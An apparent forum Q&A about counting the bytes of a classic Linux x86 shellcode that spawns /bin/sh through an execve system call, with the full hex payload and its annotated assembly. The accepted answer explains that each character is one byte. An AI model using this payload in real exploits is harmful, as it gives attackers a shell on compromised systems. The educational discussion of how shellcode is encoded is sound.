# Counting number of bytes in shellcode

Tags: hex, byte

I'm wondering how many bytes the following code (shellcode) is:

```
"\x31\xc0"             /* Line 1:  xorl    %eax,%eax              */
"\x50"                 /* Line 2:  pushl   %eax                   */
"\x68""//sh"           /* Line 3:  pushl   $0x68732f2f            */
"\x68""/bin"           /* Line 4:  pushl   $0x6e69622f            */
"\x89\xe3"             /* Line 5:  movl    %esp,%ebx              */
"\x50"                 /* Line 6:  pushl   %eax                   */
"\x53"                 /* Line 7:  pushl   %ebx                   */
"\x89\xe1"             /* Line 8:  movl    %esp,%ecx              */
"\x99"                 /* Line 9:  cdq                            */
"\xb0\x0b"             /* Line 10: movb    $0x0b,%al              */
"\xcd\x80"             /* Line 11: int     $0x80                  */
```

I know that there are eight bits in a byte, so one hexadecimal pair is one byte. For example, `\x31` is `0x31`, which is one byte. But I'm unsure how how to count the `//sh` and `/bin` text on line 3 and line 4, respectively. Do I count those as single bytes as well? So would the total size of this shellcode be 18 bytes?

Answer (score 1, accepted):

A `char` data type is 1 byte so the size for both strings is 4 bytes. You can confirm this using Python:

```
>>> len(b'/bin')
4
>>> (0x6e69622f).to_bytes(4, "little")
b'/bin'
```